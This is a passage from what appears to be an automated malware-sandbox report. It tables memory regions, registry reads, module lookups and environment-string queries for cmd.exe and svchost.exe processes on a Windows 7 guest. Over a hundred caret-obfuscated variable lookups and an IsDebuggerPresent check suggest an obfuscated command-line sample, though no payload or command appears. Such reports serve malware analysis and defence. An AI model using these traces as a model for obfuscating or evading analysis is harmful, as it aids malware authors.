|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b60000 | 0x01b60000 | 0x01ea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01eb0000 | 0x0217efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49d50000 | 0x49da8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee6880000 | 0x7fee6887fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd3fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xadc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49d50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-01 09:27:43 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 135767 |
|
1 |
Environment (161)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = PrOGRaMFIlES, result_out = C:\Program Files |
|
1 | |
| Get Environment String | name = aPPdAta, result_out = C:\Users\aETAdzjz\AppData\Roaming |
|
1 | |
| Get Environment String | name = r^M |
|
1 | |
| Get Environment String | name = B^9s |
|
1 | |
| Get Environment String | name = 7z |
|
1 | |
| Get Environment String | name = s^O |
|
1 | |
| Get Environment String | name = c^g |
|
1 | |
| Get Environment String | name = ^rj^UN |
|
1 | |
| Get Environment String | name = sZ^G |
|
1 | |
| Get Environment String | name = ^Vp^05 |
|
1 | |
| Get Environment String | name = ^8R |
|
1 | |
| Get Environment String | name = D^RKS |
|
1 | |
| Get Environment String | name = ^Eh^p |
|
1 | |
| Get Environment String | name = gx^b |
|
1 | |
| Get Environment String | name = ^6vzH |
|
1 | |
| Get Environment String | name = ^Rz |
|
1 | |
| Get Environment String | name = 9c^u^B |
|
1 | |
| Get Environment String | name = ^G5Q1 |
|
1 | |
| Get Environment String | name = v^F |
|
1 | |
| Get Environment String | name = uU^H |
|
1 | |
| Get Environment String | name = v^Z^c |
|
1 | |
| Get Environment String | name = a^Xch |
|
1 | |
| Get Environment String | name = P^d^J6 |
|
1 | |
| Get Environment String | name = L^b |
|
1 | |
| Get Environment String | name = ^Zb |
|
1 | |
| Get Environment String | name = ^R5qC |
|
1 | |
| Get Environment String | name = ^Z13 |
|
1 | |
| Get Environment String | name = j1 |
|
1 | |
| Get Environment String | name = x^S |
|
1 | |
| Get Environment String | name = eZ^P |
|
1 | |
| Get Environment String | name = ^a^z8 |
|
1 | |
| Get Environment String | name = ^U19 |
|
1 | |
| Get Environment String | name = b^1 |
|
1 | |
| Get Environment String | name = ^AN |
|
1 | |
| Get Environment String | name = Sq^5^s |
|
1 | |
| Get Environment String | name = JG^A |
|
1 | |
| Get Environment String | name = ^LK |
|
1 | |
| Get Environment String | name = UQ7^k |
|
1 | |
| Get Environment String | name = ^J^F^O6 |
|
1 | |
| Get Environment String | name = bv |
|
1 | |
| Get Environment String | name = us6 |
|
1 | |
| Get Environment String | name = ^c^wH |
|
1 | |
| Get Environment String | name = c^WSV |
|
1 | |
| Get Environment String | name = C^d^J |
|
1 | |
| Get Environment String | name = G^Y |
|
1 | |
| Get Environment String | name = ^q0^C^c |
|
1 | |
| Get Environment String | name = ^e^yWN |
|
1 | |
| Get Environment String | name = ^Z^HTE |
|
1 | |
| Get Environment String | name = G1^yS |
|
1 | |
| Get Environment String | name = ^ep3A |
|
1 | |
| Get Environment String | name = ^ir^1^V |
|
1 | |
| Get Environment String | name = l^6e |
|
1 | |
| Get Environment String | name = Zz^t |
|
1 | |
| Get Environment String | name = ^BW7 |
|
1 | |
| Get Environment String | name = LI^j |
|
1 | |
| Get Environment String | name = ^aMG |
|
1 | |
| Get Environment String | name = I1 |
|
1 | |
| Get Environment String | name = J^6 |
|
1 | |
| Get Environment String | name = ^cN^Vz |
|
1 | |
| Get Environment String | name = C^ij |
|
1 | |
| Get Environment String | name = b^aCI |
|
1 | |
| Get Environment String | name = OE^9^Q |
|
1 | |
| Get Environment String | name = J^Z |
|
1 | |
| Get Environment String | name = ^DG |
|
1 | |
| Get Environment String | name = q^Xu |
|
1 | |
| Get Environment String | name = ^E^f |
|
1 | |
| Get Environment String | name = x^dNR |
|
1 | |
| Get Environment String | name = g^I |
|
1 | |
| Get Environment String | name = 3^y |
|
1 | |
| Get Environment String | name = ^S^l |
|
1 | |
| Get Environment String | name = dn |
|
1 | |
| Get Environment String | name = ^7^2 |
|
1 | |
| Get Environment String | name = ^H8^O |
|
1 | |
| Get Environment String | name = q8 |
|
1 | |
| Get Environment String | name = ^u5 |
|
1 | |
| Get Environment String | name = ^s^Hnp |
|
1 | |
| Get Environment String | name = ^aw^yI |
|
1 | |
| Get Environment String | name = c^LM |
|
1 | |
| Get Environment String | name = ^0zSA |
|
1 | |
| Get Environment String | name = Op^1 |
|
1 | |
| Get Environment String | name = ^Dq4G |
|
1 | |
| Get Environment String | name = ^Rw |
|
1 | |
| Get Environment String | name = r^Y |
|
1 | |
| Get Environment String | name = ^z^RJ |
|
1 | |
| Get Environment String | name = ^g^Vkp |
|
1 | |
| Get Environment String | name = bC^0 |
|
1 | |
| Get Environment String | name = ^3B |
|
1 | |
| Get Environment String | name = ^a^g |
|
1 | |
| Get Environment String | name = ^6rH^Y |
|
1 | |
| Get Environment String | name = ^CY |
|
1 | |
| Get Environment String | name = ^M^t |
|
1 | |
| Get Environment String | name = Ea^u |
|
1 | |
| Get Environment String | name = Eh |
|
1 | |
| Get Environment String | name = e^q |
|
1 | |
| Get Environment String | name = ^Je |
|
1 | |
| Get Environment String | name = q^2 |
|
1 | |
| Get Environment String | name = ^xm |
|
1 | |
| Get Environment String | name = Co^Jf |
|
1 | |
| Get Environment String | name = z^R |
|
1 | |
| Get Environment String | name = HJ^VR |
|
1 | |
| Get Environment String | name = m^Lwq |
|
1 | |
| Get Environment String | name = ^lPo |
|
1 | |
| Get Environment String | name = ^i8T3 |
|
1 | |
| Get Environment String | name = ^bn |
|
1 | |
| Get Environment String | name = ^OZ |
|
1 | |
| Get Environment String | name = g^BQ |
|
1 | |
| Get Environment String | name = ^I^r |
|
1 | |
| Get Environment String | name = D^vI |
|
1 | |
| Get Environment String | name = ^VDG |
|
1 | |
| Get Environment String | name = J^V^w |
|
1 | |
| Get Environment String | name = uq^LY |
|
1 | |
| Get Environment String | name = l^V^p |
|
1 | |
| Get Environment String | name = G^U |
|
1 | |
| Get Environment String | name = LI |
|
1 | |
| Get Environment String | name = 3^M^K^1 |
|
1 | |
| Get Environment String | name = 0^A |
|
1 | |
| Get Environment String | name = q^G |
|
1 | |
| Get Environment String | name = bO^q |
|
1 | |
| Get Environment String | name = ^cI |
|
1 | |
| Get Environment String | name = X^j |
|
1 | |
| Get Environment String | name = ^3R^Y |
|
1 | |
| Get Environment String | name = bI^He |
|
1 | |
| Get Environment String | name = ^cOyd |
|
1 | |
| Get Environment String | name = ^h^g |
|
1 | |
| Get Environment String | name = l^R |
|
1 | |
| Get Environment String | name = ^dv |
|
1 | |
| Get Environment String | name = ^rp |
|
1 | |
| Get Environment String | name = q^X |
|
1 | |
| Get Environment String | name = ^olr8 |
|
1 | |
| Get Environment String | name = o^JV |
|
1 | |
| Get Environment String | name = ^A2 |
|
1 | |
| Get Environment String | name = cni^h |
|
1 | |
| Get Environment String | name = I^G4^Q |
|
1 | |
| Get Environment String | name = 8^i47 |
|
1 | |
| Get Environment String | name = c2^Q |
|
1 | |
| Get Environment String | name = 3^C^he |
|
1 | |
| Get Environment String | name = O^c^W^L |
|
1 | |
| Get Environment String | name = ^oP8 |
|
1 | |
| Get Environment String | name = DQ |
|
1 | |
| Get Environment String | name = b^HT |
|
1 | |
| Get Environment String | name = ^ID |
|
1 | |
| Get Environment String | name = e5^S |
|
1 | |
| Get Environment String | name = p^v |
|
1 | |
| Get Environment String | name = & ,, ^c |
|
1 | |
| Get Environment String | name = pROgraMDaTA, result_out = C:\ProgramData |
|
1 | |
| Get Environment String | name = programfILES, result_out = C:\Program Files |
|
1 | |
| Get Environment String | name = q4j^ |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #3: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:24, Reason: RPC Server |
| Unmonitor | End Time: 00:05:10, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:46 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x36c |
| Parent PID | 0x1d4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
AB4
0x
A68
0x
A64
0x
A60
0x
A5C
0x
2B0
0x
14C
0x
7DC
0x
730
0x
31C
0x
24C
0x
298
0x
150
0x
7FC
0x
7E4
0x
790
0x
774
0x
750
0x
74C
0x
71C
0x
718
0x
70C
0x
6EC
0x
4C0
0x
498
0x
494
0x
484
0x
480
0x
474
0x
1CC
0x
120
0x
3FC
0x
3F0
0x
3E4
0x
398
0x
394
0x
390
0x
384
0x
378
0x
370
0x
B04
0x
B08
0x
B0C
0x
B88
0x
BC4
0x
BC8
0x
BCC
0x
BF4
0x
BF8
0x
BFC
0x
818
0x
814
0x
810
0x
80C
0x
7C8
0x
884
0x
870
0x
57C
0x
578
0x
B54
0x
A84
0x
A98
0x
968
0x
840
0x
AB0
0x
AAC
0x
31C
0x
390
0x
9F4
0x
B28
0x
A50
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00140000 | 0x00143fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x00170000 | 0x0019ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x001a0000 | 0x001a3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x00350000 | 0x003b5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x0089ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x00c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| firewallapi.dll.mui | 0x00ca0000 | 0x00cbbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000cc0000 | 0x00cc0000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00dc0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000df0000 | 0x00df0000 | 0x00dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e40000 | 0x00e40000 | 0x00ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001060000 | 0x01060000 | 0x010dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x010e0000 | 0x013aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013d0000 | 0x013d0000 | 0x0144ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x014cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001520000 | 0x01520000 | 0x0159ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015a0000 | 0x015a0000 | 0x0161ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001620000 | 0x01620000 | 0x0169ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0175ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001760000 | 0x01760000 | 0x017dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001810000 | 0x01810000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0190ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x019bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019e0000 | 0x019e0000 | 0x01a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a60000 | 0x01a60000 | 0x01adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02362fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x0275ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002960000 | 0x02960000 | 0x02a5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dd0000 | 0x02dd0000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f20000 | 0x02f20000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f80000 | 0x02f80000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x031cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x0326ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x0334ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003460000 | 0x03460000 | 0x0355ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003590000 | 0x03590000 | 0x0360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003630000 | 0x03630000 | 0x036affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x0390ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a50000 | 0x03a50000 | 0x03acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b80000 | 0x03b80000 | 0x03bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f40000 | 0x03f40000 | 0x03fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004010000 | 0x04010000 | 0x0408ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004090000 | 0x04090000 | 0x0410ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x0420ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043a0000 | 0x043a0000 | 0x0459ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045e0000 | 0x045e0000 | 0x0465ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004690000 | 0x04690000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| svchost.exe | 0xffc20000 | 0xffc2afff | Memory Mapped File | rwx |
|
|
|
- |
| qmgr.dll | 0x7fee6890000 | 0x7fee6961fff | Memory Mapped File | rwx |
|
|
|
- |
| ncprov.dll | 0x7fee6bf0000 | 0x7fee6c05fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpipcfg.dll | 0x7fef3590000 | 0x7fef35d1fff | Memory Mapped File | rwx |
|
|
|
- |
| mprapi.dll | 0x7fef4dd0000 | 0x7fef4e09fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef59c0000 | 0x7fef59cbfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemess.dll | 0x7fef5b20000 | 0x7fef5b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5ba0000 | 0x7fef5bb5fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprvsd.dll | 0x7fef5bc0000 | 0x7fef5c7bfff | Memory Mapped File | rwx |
|
|
|
- |
| repdrvfs.dll | 0x7fef5c80000 | 0x7fef5cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5d00000 | 0x7fef5d25fff | Memory Mapped File | rwx |
|
|
|
- |
| hnetcfg.dll | 0x7fef5d30000 | 0x7fef5d9afff | Memory Mapped File | rwx |
|
|
|
- |
| resutils.dll | 0x7fef5da0000 | 0x7fef5db8fff | Memory Mapped File | rwx |
|
|
|
- |
| clusapi.dll | 0x7fef5dc0000 | 0x7fef5e0ffff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| esscli.dll | 0x7fef5e30000 | 0x7fef5e9efff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcore.dll | 0x7fef5ea0000 | 0x7fef5fcefff | Memory Mapped File | rwx |
|
|
|
- |
| nci.dll | 0x7fef5fd0000 | 0x7fef5fe9fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef5ff0000 | 0x7fef6063fff | Memory Mapped File | rwx |
|
|
|
- |
| netcfgx.dll | 0x7fef6070000 | 0x7fef60f3fff | Memory Mapped File | rwx |
|
|
|
